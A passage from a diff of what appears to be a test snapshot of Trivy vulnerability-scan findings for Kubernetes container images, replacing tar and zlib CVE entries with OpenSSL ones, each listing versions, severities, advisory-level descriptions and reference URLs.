"http://www.openwall.com/lists/oss-security/2023/05/07/2", + "value": "https://security.netapp.com/advisory/ntap-20220707-0008/", }, { "type": "URL", - "value": "https://blog.hackeriet.no/perl-http-tiny-insecure-tls-default-affects-cpan-modules/", + "value": "https://ubuntu.com/security/notices/USN-5488-1", }, { "type": "URL", - "value": "https://hackeriet.github.io/cpan-http-tiny-overview/", + "value": "https://ubuntu.com/security/notices/USN-5488-2", }, { "type": "URL", - "value": "https://www.openwall.com/lists/oss-security/2023/04/18/14", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-2068", }, { "type": "URL", - "value": "https://www.openwall.com/lists/oss-security/2023/05/03/4", + "value": "https://www.debian.org/security/2022/dsa-5169", }, { "type": "URL", - "value": "https://www.reddit.com/r/perl/comments/111tadi/psa_httptiny_disabled_ssl_verification_by_default/", + "value": "https://www.openssl.org/news/secadv/20220621.txt", }, ], - "severity": "LOW", + "severity": "HIGH", }, { "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2005-2541", - "installedVersion": "1.34+dfsg-1", - "packageName": "tar", + "fixedVersion": "1.1.1d-0+deb10u5", + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2021-23840", + "installedVersion": "1.1.1d-0+deb10u4", + "packageName": "libssl1.1", "references": [ - "http://marc.info/?l=bugtraq&m=112327628230258&w=2", - "https://access.redhat.com/security/cve/CVE-2005-2541", - "https://lists.apache.org/thread.html/rc713534b10f9daeee2e0990239fa407e2118e4aa9e88a7041177497c@%3Cissues.guacamole.apache.org%3E", - "https://nvd.nist.gov/vuln/detail/CVE-2005-2541", - "https://www.cve.org/CVERecord?id=CVE-2005-2541", + "https://access.redhat.com/security/cve/CVE-2021-23840", + "https://cert-portal.siemens.com/productcert/pdf/ssa-389290.pdf", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-23840", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=6a51b9e1d0cf0bf8515f7201b68fb0a3482b3dc1", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=9b1129239f3ebb1d1c98ce9ed41d5c9476c47cb2", + "https://github.com/advisories/GHSA-qgm6-9472-pwq7", + "https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44846", + "https://kc.mcafee.com/corporate/index?page=content&id=SB10366", + "https://linux.oracle.com/cve/CVE-2021-23840.html", + "https://linux.oracle.com/errata/ELSA-2021-9561.html", + "https://lists.apache.org/thread.html/r58af02e294bd07f487e2c64ffc0a29b837db5600e33b6e698b9d696b@%3Cissues.bookkeeper.apache.org%3E", + "https://lists.apache.org/thread.html/rf4c02775860db415b4955778a131c2795223f61cb8c6a450893651e4@%3Cissues.bookkeeper.apache.org%3E", + "https://nvd.nist.gov/vuln/detail/CVE-2021-23840", + "https://rustsec.org/advisories/RUSTSEC-2021-0057.html", + "https://security.gentoo.org/glsa/202103-03", + "https://security.netapp.com/advisory/ntap-20210219-0009/", + "https://ubuntu.com/security/notices/USN-4738-1", + "https://ubuntu.com/security/notices/USN-5088-1", + "https://www.cve.org/CVERecord?id=CVE-2021-23840", + "https://www.debian.org/security/2021/dsa-4855", + "https://www.openssl.org/news/secadv/20210216.txt", + "https://www.oracle.com//security-alerts/cpujul2021.html", + "https://www.oracle.com/security-alerts/cpuApr2021.html", + "https://www.oracle.com/security-alerts/cpuapr2022.html", + "https://www.oracle.com/security-alerts/cpujan2022.html", + "https://www.oracle.com/security-alerts/cpuoct2021.html", + "https://www.tenable.com/security/tns-2021-03", + "https://www.tenable.com/security/tns-2021-09", + "https://www.tenable.com/security/tns-2021-10", ], }, "category": "Vulnerability", - "description": "Tar 1.15.1 does not properly warn the user when extracting setuid or setgid files, which may allow local users or remote attackers to gain privileges.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", - "mitigation": undefined, - "name": "tar: does not properly warn the user when extracting setuid or setgid files", - "references": [ - { - "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2005-2541", - }, - { - "type": "URL", - "value": "http://marc.info/?l=bugtraq&m=112327628230258&w=2", - }, - { - "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2005-2541", - }, + "description": "Calls to EVP_CipherUpdate, EVP_EncryptUpdate and EVP_DecryptUpdate may overflow the output length argument in some cases where the input length is close to the maximum permissable length for an integer on the platform. In such cases the return value from the function call will be 1 (indicating success), but the output length value will be negative. This could cause applications to behave incorrectly or crash. OpenSSL versions 1.1.1i and below are affected by this issue. Users of these versions should upgrade to OpenSSL 1.1.1j. OpenSSL versions 1.0.2x and below are affected by this issue. However OpenSSL 1.0.2 is out of support and no longer receiving public updates. Premium support customers of OpenSSL 1.0.2 should upgrade to 1.0.2y. Other users should upgrade to 1.1.1j. Fixed in OpenSSL 1.1.1j (Affected 1.1.1-1.1.1i). Fixed in OpenSSL 1.0.2y (Affected 1.0.2-1.0.2x).", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "mitigation": undefined, + "name": "openssl: integer overflow in CipherUpdate", + "references": [ { "type": "URL", - "value": "https://lists.apache.org/thread.html/rc713534b10f9daeee2e0990239fa407e2118e4aa9e88a7041177497c@%3Cissues.guacamole.apache.org%3E", + "value": "https://avd.aquasec.com/nvd/cve-2021-23840", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2005-2541", + "value": "https://access.redhat.com/security/cve/CVE-2021-23840", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2005-2541", + "value": "https://cert-portal.siemens.com/productcert/pdf/ssa-389290.pdf", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2022-48303", - "installedVersion": "1.34+dfsg-1", - "packageName": "tar", - "references": [ - "https://access.redhat.com/errata/RHSA-2023:0959", - "https://access.redhat.com/security/cve/CVE-2022-48303", - "https://bugzilla.redhat.com/2149722", - "https://bugzilla.redhat.com/show_bug.cgi?id=2149722", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-48303", - "https://errata.almalinux.org/9/ALSA-2023-0959.html", - "https://errata.rockylinux.org/RLSA-2023:0959", - "https://linux.oracle.com/cve/CVE-2022-48303.html", - "https://linux.oracle.com/errata/ELSA-2023-0959.html", - "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/CRY7VEL4AIG3GLIEVCTOXRZNSVYDYYUD/", - "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/X5VQYCO52Z7GAVCLRYUITN7KXHLRZQS4/", - "https://nvd.nist.gov/vuln/detail/CVE-2022-48303", - "https://savannah.gnu.org/bugs/?62387", - "https://savannah.gnu.org/patch/?10307", - "https://ubuntu.com/security/notices/USN-5900-1", - "https://ubuntu.com/security/notices/USN-5900-2", - "https://www.cve.org/CVERecord?id=CVE-2022-48303", - ], - }, - "category": "Vulnerability", - "description": "GNU Tar through 1.34 has a one-byte out-of-bounds read that results in use of uninitialized memory for a conditional jump. Exploitation to change the flow of control has not been demonstrated. The issue occurs in from_header in list.c via a V7 archive in which mtime has approximately 11 whitespace characters.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", - "mitigation": undefined, - "name": "heap buffer overflow at from_header() in list.c via specially crafted checksum", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-48303", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-23840", }, { "type": "URL", - "value": "https://access.redhat.com/errata/RHSA-2023:0959", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=6a51b9e1d0cf0bf8515f7201b68fb0a3482b3dc1", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-48303", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=9b1129239f3ebb1d1c98ce9ed41d5c9476c47cb2", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2149722", + "value": "https://github.com/advisories/GHSA-qgm6-9472-pwq7", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2149722", + "value": "https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44846", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-48303", + "value": "https://kc.mcafee.com/corporate/index?page=content&id=SB10366", }, { "type": "URL", - "value": "https://errata.almalinux.org/9/ALSA-2023-0959.html", + "value": "https://linux.oracle.com/cve/CVE-2021-23840.html", }, { "type": "URL", - "value": "https://errata.rockylinux.org/RLSA-2023:0959", + "value": "https://linux.oracle.com/errata/ELSA-2021-9561.html", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2022-48303.html", + "value": "https://lists.apache.org/thread.html/r58af02e294bd07f487e2c64ffc0a29b837db5600e33b6e698b9d696b@%3Cissues.bookkeeper.apache.org%3E", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2023-0959.html", + "value": "https://lists.apache.org/thread.html/rf4c02775860db415b4955778a131c2795223f61cb8c6a450893651e4@%3Cissues.bookkeeper.apache.org%3E", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/CRY7VEL4AIG3GLIEVCTOXRZNSVYDYYUD/", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-23840", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/X5VQYCO52Z7GAVCLRYUITN7KXHLRZQS4/", + "value": "https://rustsec.org/advisories/RUSTSEC-2021-0057.html", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-48303", + "value": "https://security.gentoo.org/glsa/202103-03", }, { "type": "URL", - "value": "https://savannah.gnu.org/bugs/?62387", + "value": "https://security.netapp.com/advisory/ntap-20210219-0009/", }, { "type": "URL", - "value": "https://savannah.gnu.org/patch/?10307", + "value": "https://ubuntu.com/security/notices/USN-4738-1", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5900-1", + "value": "https://ubuntu.com/security/notices/USN-5088-1", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5900-2", + "value": "https://www.cve.org/CVERecord?id=CVE-2021-23840", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-48303", + "value": "https://www.debian.org/security/2021/dsa-4855", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": "1:1.2.11.dfsg-2+deb11u2", - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2022-37434", - "installedVersion": "1:1.2.11.dfsg-2", - "packageName": "zlib1g", - "references": [ - "http://seclists.org/fulldisclosure/2022/Oct/37", - "http://seclists.org/fulldisclosure/2022/Oct/38", - "http://seclists.org/fulldisclosure/2022/Oct/41", - "http://seclists.org/fulldisclosure/2022/Oct/42", - "http://www.openwall.com/lists/oss-security/2022/08/05/2", - "http://www.openwall.com/lists/oss-security/2022/08/09/1", - "https://access.redhat.com/errata/RHSA-2022:8291", - "https://access.redhat.com/security/cve/CVE-2022-37434", - "https://bugzilla.redhat.com/2116639", - "https://bugzilla.redhat.com/show_bug.cgi?id=2053198", - "https://bugzilla.redhat.com/show_bug.cgi?id=2077431", - "https://bugzilla.redhat.com/show_bug.cgi?id=2081296", - "https://bugzilla.redhat.com/show_bug.cgi?id=2116639", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-37434", - "https://errata.almalinux.org/9/ALSA-2022-8291.html", - "https://errata.rockylinux.org/RLSA-2022:8291", - "https://github.com/curl/curl/issues/9271", - "https://github.com/ivd38/zlib_overflow", - "https://github.com/madler/zlib/blob/21767c654d31d2dccdde4330529775c6c5fd5389/zlib.h#L1062-L1063", - "https://github.com/madler/zlib/commit/eff308af425b67093bab25f80f1ae950166bece1", - "https://github.com/nodejs/node/blob/75b68c6e4db515f76df73af476eccf382bbcb00a/deps/zlib/inflate.c#L762-L764", - "https://linux.oracle.com/cve/CVE-2022-37434.html", - "https://linux.oracle.com/errata/ELSA-2023-1095.html", - "https://lists.debian.org/debian-lts-announce/2022/09/msg00012.html", - "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/JWN4VE3JQR4O2SOUS5TXNLANRPMHWV4I/", - "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/NMBOJ77A7T7PQCARMDUK75TE6LLESZ3O/", - "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/PAVPQNCG3XRLCLNSQRM3KAN5ZFMVXVTY/", - "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/X5U7OTKZSHY2I3ZFJSR2SHFHW72RKGDK/", - "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/YRQAI7H4M4RQZ2IWZUEEXECBE5D56BH2/", - "https://nvd.nist.gov/vuln/detail/CVE-2022-37434", - "https://security.netapp.com/advisory/ntap-20220901-0005/", - "https://security.netapp.com/advisory/ntap-20230427-0007/", - "https://support.apple.com/kb/HT213488", - "https://support.apple.com/kb/HT213489", - "https://support.apple.com/kb/HT213490", - "https://support.apple.com/kb/HT213491", - "https://support.apple.com/kb/HT213493", - "https://support.apple.com/kb/HT213494", - "https://ubuntu.com/security/notices/USN-5570-1", - "https://ubuntu.com/security/notices/USN-5570-2", - "https://ubuntu.com/security/notices/USN-5573-1", - "https://www.cve.org/CVERecord?id=CVE-2022-37434", - "https://www.debian.org/security/2022/dsa-5218", - ], - }, - "category": "Vulnerability", - "description": "zlib through 1.2.12 has a heap-based buffer over-read or buffer overflow in inflate in inflate.c via a large gzip header extra field. NOTE: only applications that call inflateGetHeader are affected. Some common applications bundle the affected zlib source code but may be unable to call inflateGetHeader (e.g., see the nodejs/node reference).", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", - "mitigation": undefined, - "name": "heap-based buffer over-read and overflow in inflate() in inflate.c via a large gzip header extra field", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-37434", + "value": "https://www.openssl.org/news/secadv/20210216.txt", }, { "type": "URL", - "value": "http://seclists.org/fulldisclosure/2022/Oct/37", + "value": "https://www.oracle.com//security-alerts/cpujul2021.html", }, { "type": "URL", - "value": "http://seclists.org/fulldisclosure/2022/Oct/38", + "value": "https://www.oracle.com/security-alerts/cpuApr2021.html", }, { "type": "URL", - "value": "http://seclists.org/fulldisclosure/2022/Oct/41", + "value": "https://www.oracle.com/security-alerts/cpuapr2022.html", }, { "type": "URL", - "value": "http://seclists.org/fulldisclosure/2022/Oct/42", + "value": "https://www.oracle.com/security-alerts/cpujan2022.html", }, { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2022/08/05/2", + "value": "https://www.oracle.com/security-alerts/cpuoct2021.html", }, { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2022/08/09/1", + "value": "https://www.tenable.com/security/tns-2021-03", }, { "type": "URL", - "value": "https://access.redhat.com/errata/RHSA-2022:8291", + "value": "https://www.tenable.com/security/tns-2021-09", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-37434", + "value": "https://www.tenable.com/security/tns-2021-10", }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": "1.1.1d-0+deb10u7", + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2021-3712", + "installedVersion": "1.1.1d-0+deb10u4", + "packageName": "libssl1.1", + "references": [ + "http://www.openwall.com/lists/oss-security/2021/08/26/2", + "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2021-3712.json", + "https://access.redhat.com/security/cve/CVE-2021-3712", + "https://cert-portal.siemens.com/productcert/pdf/ssa-244969.pdf", + "https://cert-portal.siemens.com/productcert/pdf/ssa-389290.pdf", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3712", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=94d23fcff9b2a7a8368dfe52214d5c2569882c11", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=ccb0a11145ee72b042d10593a64eaf9e8a55ec12", + "https://github.com/advisories/GHSA-q9wj-f4qw-6vfj", + "https://kc.mcafee.com/corporate/index?page=content&id=SB10366", + "https://linux.oracle.com/cve/CVE-2021-3712.html", + "https://linux.oracle.com/errata/ELSA-2022-9023.html", + "https://lists.apache.org/thread.html/r18995de860f0e63635f3008fd2a6aca82394249476d21691e7c59c9e@%3Cdev.tomcat.apache.org%3E", + "https://lists.apache.org/thread.html/rad5d9f83f0d11fb3f8bb148d179b8a9ad7c6a17f18d70e5805a713d1@%3Cdev.tomcat.apache.org%3E", + "https://lists.debian.org/debian-lts-announce/2021/09/msg00014.html", + "https://lists.debian.org/debian-lts-announce/2021/09/msg00021.html", + "https://nvd.nist.gov/vuln/detail/CVE-2021-3712", + "https://rustsec.org/advisories/RUSTSEC-2021-0098.html", + "https://security.gentoo.org/glsa/202209-02", + "https://security.gentoo.org/glsa/202210-02", + "https://security.netapp.com/advisory/ntap-20210827-0010/", + "https://ubuntu.com/security/notices/USN-5051-1", + "https://ubuntu.com/security/notices/USN-5051-2", + "https://ubuntu.com/security/notices/USN-5051-3", + "https://ubuntu.com/security/notices/USN-5051-4 (regression only in trusty/esm)", + "https://ubuntu.com/security/notices/USN-5088-1", + "https://www.cve.org/CVERecord?id=CVE-2021-3712", + "https://www.debian.org/security/2021/dsa-4963", + "https://www.openssl.org/news/secadv/20210824.txt", + "https://www.oracle.com/security-alerts/cpuapr2022.html", + "https://www.oracle.com/security-alerts/cpujan2022.html", + "https://www.oracle.com/security-alerts/cpuoct2021.html", + "https://www.tenable.com/security/tns-2021-16", + "https://www.tenable.com/security/tns-2022-02", + ], + }, + "category": "Vulnerability", + "description": "ASN.1 strings are represented internally within OpenSSL as an ASN1_STRING structure which contains a buffer holding the string data and a field holding the buffer length. This contrasts with normal C strings which are repesented as a buffer for the string data which is terminated with a NUL (0) byte. Although not a strict requirement, ASN.1 strings that are parsed using OpenSSL's own "d2i" functions (and other similar parsing functions) as well as any string whose value has been set with the ASN1_STRING_set() function will additionally NUL terminate the byte array in the ASN1_STRING structure. However, it is possible for applications to directly construct valid ASN1_STRING structures which do not NUL terminate the byte array by directly setting the "data" and "length" fields in the ASN1_STRING array. This can also happen by using the ASN1_STRING_set0() function. Numerous OpenSSL functions that print ASN.1 data have been found to assume that the ASN1_STRING byte array will be NUL terminated, even though this is not guaranteed for strings that have been directly constructed. Where an application requests an ASN.1 structure to be printed, and where that ASN.1 structure contains ASN1_STRINGs that have been directly constructed by the application without NUL terminating the "data" field, then a read buffer overrun can occur. The same thing can also occur during name constraints processing of certificates (for example if a certificate has been directly constructed by the application instead of loading it via the OpenSSL parsing functions, and the certificate contains non NUL terminated ASN1_STRING structures). It can also occur in the X509_get1_email(), X509_REQ_get1_email() and X509_get1_ocsp() functions. If a malicious actor can cause an application to directly construct an ASN1_STRING and then process it through one of the affected OpenSSL functions then this issue could be hit. This might result in a crash (causing a Denial of Service attack). It could also result in the disclosure of private memory contents (such as private keys, or sensitive plaintext). Fixed in OpenSSL 1.1.1l (Affected 1.1.1-1.1.1k). Fixed in OpenSSL 1.0.2za (Affected 1.0.2-1.0.2y).", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "mitigation": undefined, + "name": "openssl: Read buffer overruns processing ASN.1 strings", + "references": [ { "type": "URL", - "value": "https://bugzilla.redhat.com/2116639", + "value": "https://avd.aquasec.com/nvd/cve-2021-3712", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2053198", + "value": "http://www.openwall.com/lists/oss-security/2021/08/26/2", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2077431", + "value": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2021-3712.json", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2081296", + "value": "https://access.redhat.com/security/cve/CVE-2021-3712", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2116639", + "value": "https://cert-portal.siemens.com/productcert/pdf/ssa-244969.pdf", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-37434", + "value": "https://cert-portal.siemens.com/productcert/pdf/ssa-389290.pdf", }, { "type": "URL", - "value": "https://errata.almalinux.org/9/ALSA-2022-8291.html", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3712", }, { "type": "URL", - "value": "https://errata.rockylinux.org/RLSA-2022:8291", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=94d23fcff9b2a7a8368dfe52214d5c2569882c11", }, { "type": "URL", - "value": "https://github.com/curl/curl/issues/9271", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=ccb0a11145ee72b042d10593a64eaf9e8a55ec12", }, { "type": "URL", - "value": "https://github.com/ivd38/zlib_overflow", + "value": "https://github.com/advisories/GHSA-q9wj-f4qw-6vfj", }, { "type": "URL", - "value": "https://github.com/madler/zlib/blob/21767c654d31d2dccdde4330529775c6c5fd5389/zlib.h#L1062-L1063", + "value": "https://kc.mcafee.com/corporate/index?page=content&id=SB10366", }, { "type": "URL", - "value": "https://github.com/madler/zlib/commit/eff308af425b67093bab25f80f1ae950166bece1", + "value": "https://linux.oracle.com/cve/CVE-2021-3712.html", }, { "type": "URL", - "value": "https://github.com/nodejs/node/blob/75b68c6e4db515f76df73af476eccf382bbcb00a/deps/zlib/inflate.c#L762-L764", + "value": "https://linux.oracle.com/errata/ELSA-2022-9023.html", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2022-37434.html", + "value": "https://lists.apache.org/thread.html/r18995de860f0e63635f3008fd2a6aca82394249476d21691e7c59c9e@%3Cdev.tomcat.apache.org%3E", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2023-1095.html", + "value": "https://lists.apache.org/thread.html/rad5d9f83f0d11fb3f8bb148d179b8a9ad7c6a17f18d70e5805a713d1@%3Cdev.tomcat.apache.org%3E", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2022/09/msg00012.html", + "value": "https://lists.debian.org/debian-lts-announce/2021/09/msg00014.html", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/JWN4VE3JQR4O2SOUS5TXNLANRPMHWV4I/", + "value": "https://lists.debian.org/debian-lts-announce/2021/09/msg00021.html", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/NMBOJ77A7T7PQCARMDUK75TE6LLESZ3O/", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-3712", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/PAVPQNCG3XRLCLNSQRM3KAN5ZFMVXVTY/", + "value": "https://rustsec.org/advisories/RUSTSEC-2021-0098.html", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/X5U7OTKZSHY2I3ZFJSR2SHFHW72RKGDK/", + "value": "https://security.gentoo.org/glsa/202209-02", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/YRQAI7H4M4RQZ2IWZUEEXECBE5D56BH2/", + "value": "https://security.gentoo.org/glsa/202210-02", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-37434", + "value": "https://security.netapp.com/advisory/ntap-20210827-0010/", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20220901-0005/", + "value": "https://ubuntu.com/security/notices/USN-5051-1", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20230427-0007/", + "value": "https://ubuntu.com/security/notices/USN-5051-2", }, { "type": "URL", - "value": "https://support.apple.com/kb/HT213488", + "value": "https://ubuntu.com/security/notices/USN-5051-3", }, { "type": "URL", - "value": "https://support.apple.com/kb/HT213489", + "value": "https://ubuntu.com/security/notices/USN-5051-4 (regression only in trusty/esm)", }, { "type": "URL", - "value": "https://support.apple.com/kb/HT213490", + "value": "https://ubuntu.com/security/notices/USN-5088-1", }, { "type": "URL", - "value": "https://support.apple.com/kb/HT213491", + "value": "https://www.cve.org/CVERecord?id=CVE-2021-3712", }, { "type": "URL", - "value": "https://support.apple.com/kb/HT213493", + "value": "https://www.debian.org/security/2021/dsa-4963", }, { "type": "URL", - "value": "https://support.apple.com/kb/HT213494", + "value": "https://www.openssl.org/news/secadv/20210824.txt", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5570-1", + "value": "https://www.oracle.com/security-alerts/cpuapr2022.html", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5570-2", + "value": "https://www.oracle.com/security-alerts/cpujan2022.html", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5573-1", + "value": "https://www.oracle.com/security-alerts/cpuoct2021.html", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-37434", + "value": "https://www.tenable.com/security/tns-2021-16", }, { "type": "URL", - "value": "https://www.debian.org/security/2022/dsa-5218", + "value": "https://www.tenable.com/security/tns-2022-02", }, ], "severity": "HIGH", }, { "attributes": { - "fixedVersion": "1:1.2.11.dfsg-2+deb11u1", - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2018-25032", - "installedVersion": "1:1.2.11.dfsg-2", - "packageName": "zlib1g", + "fixedVersion": "1.1.1d-0+deb10u8", + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2022-0778", + "installedVersion": "1.1.1d-0+deb10u4", + "packageName": "libssl1.1", "references": [ + "http://packetstormsecurity.com/files/167344/OpenSSL-1.0.2-1.1.1-3.0-BN_mod_sqrt-Infinite-Loop.html", "http://seclists.org/fulldisclosure/2022/May/33", "http://seclists.org/fulldisclosure/2022/May/35", "http://seclists.org/fulldisclosure/2022/May/38", - "http://www.openwall.com/lists/oss-security/2022/03/25/2", - "http://www.openwall.com/lists/oss-security/2022/03/26/1", - "https://access.redhat.com/errata/RHSA-2022:8420", - "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2018-25032.json", - "https://access.redhat.com/security/cve/CVE-2018-25032", - "https://bugzilla.redhat.com/2067945", - "https://cert-portal.siemens.com/productcert/pdf/ssa-333517.pdf", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-25032", - "https://errata.almalinux.org/9/ALSA-2022-8420.html", - "https://github.com/madler/zlib/commit/5c44459c3b28a9bd3283aaceab7c615f8020c531", - "https://github.com/madler/zlib/compare/v1.2.11...v1.2.12", - "https://github.com/madler/zlib/issues/605", - "https://github.com/sparklemotion/nokogiri/releases/tag/v1.13.4", - "https://github.com/sparklemotion/nokogiri/security/advisories/GHSA-v6gp-9mmm-c6p5", - "https://groups.google.com/g/ruby-security-ann/c/vX7qSjsvWis/m/TJWN4oOKBwAJ", - "https://linux.oracle.com/cve/CVE-2018-25032.html", - "https://linux.oracle.com/errata/ELSA-2022-9565.html", - "https://lists.debian.org/debian-lts-announce/2022/04/msg00000.html", - "https://lists.debian.org/debian-lts-announce/2022/05/msg00008.html", - "https://lists.debian.org/debian-lts-announce/2022/09/msg00023.html", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DCZFIJBJTZ7CL5QXBFKTQ22Q26VINRUF/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DF62MVMH3QUGMBDCB3DY2ERQ6EBHTADB/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/JZZPTWRYQULAOL3AW7RZJNVZ2UONXCV4/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/NS2D2GFPFGOJUL4WQ3DUAY7HF4VWQ77F/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VOKNP2L734AEL47NRYGVZIKEFOUBQY5Y/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/XOKFMSNQ5D5WGMALBNBXU3GE442V74WU/", - "https://nvd.nist.gov/vuln/detail/CVE-2018-25032", - "https://security.gentoo.org/glsa/202210-42", - "https://security.netapp.com/advisory/ntap-20220526-0009/", - "https://security.netapp.com/advisory/ntap-20220729-0004/", + "https://access.redhat.com/errata/RHSA-2022:5326", + "https://access.redhat.com/security/cve/CVE-2022-0778", + "https://bugzilla.redhat.com/2062202", + "https://bugzilla.redhat.com/show_bug.cgi?id=2062202", + "https://cert-portal.siemens.com/productcert/pdf/ssa-712929.pdf", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-0778", + "https://errata.almalinux.org/8/ALSA-2022-5326.html", + 